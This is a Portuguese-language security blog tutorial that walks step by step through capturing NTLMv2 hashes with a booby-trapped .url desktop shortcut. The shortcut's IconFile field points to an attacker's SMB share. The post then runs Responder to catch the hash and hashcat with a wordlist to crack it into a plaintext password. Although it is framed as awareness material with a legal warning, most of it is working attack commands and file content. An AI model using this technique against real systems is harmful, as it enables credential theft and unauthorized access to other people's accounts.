InformationSecurityPro
Marcos Henrique
Shortcut Attack - Captura do Hash NTLMv2
Veja como é simples realizar a captura do Hash NTLMv2 através de um atalho (shortcut) na área de trabalho da vítima.
O objetivo é que você utilize este artigo como referência para conscientização dos seus usuários para que fiquem atentos aos ícones disponíveis na área de trabalho.
🔴 O uso indevido desta técnica é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.
01 - Passo
No computador da vítima basta criar um arquivo com o conteúdo abaixo:
- URL : Informe a URL que será aberta assim que clicar no Atalho.
- IconFile : Informe o IP da máquina do Atacante.
[InternetShortcut] URL=https://www.100security.com.br/ IconFile=\\192.168.0.76\%USERNAME%.icon IconIndex=1
02 - Passo
Salve o arquivo na Área de Trabalho com o nome de @test.url ou ~test.url :
Resultado!
03 - Passo
Na máquina do Atacante execute o responder para realizar a captura do Hash NTLMv2.
Linuxresponder -I eth0 -v
04 - Passo
Execute o Atalho e observe que você será redirecionado para o site informado na linha URL :
05 - Passo
Copie o Hash e insira em um arquivo ex: hash.txt :
Linux
Linux
cat hash.txt
06 - Passo
Utilize o hashcat e sua melhor wordlist para quebrar o Hash NTLMv2 :
Linuxhashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o senha.txt
07 - Passo
Após finalizar o processo o Hash NTLMv2 foi revelado e enviado para o arquivo senha.txt contendo a senha :
LinuxP@ssw0rd
São Paulo/SP
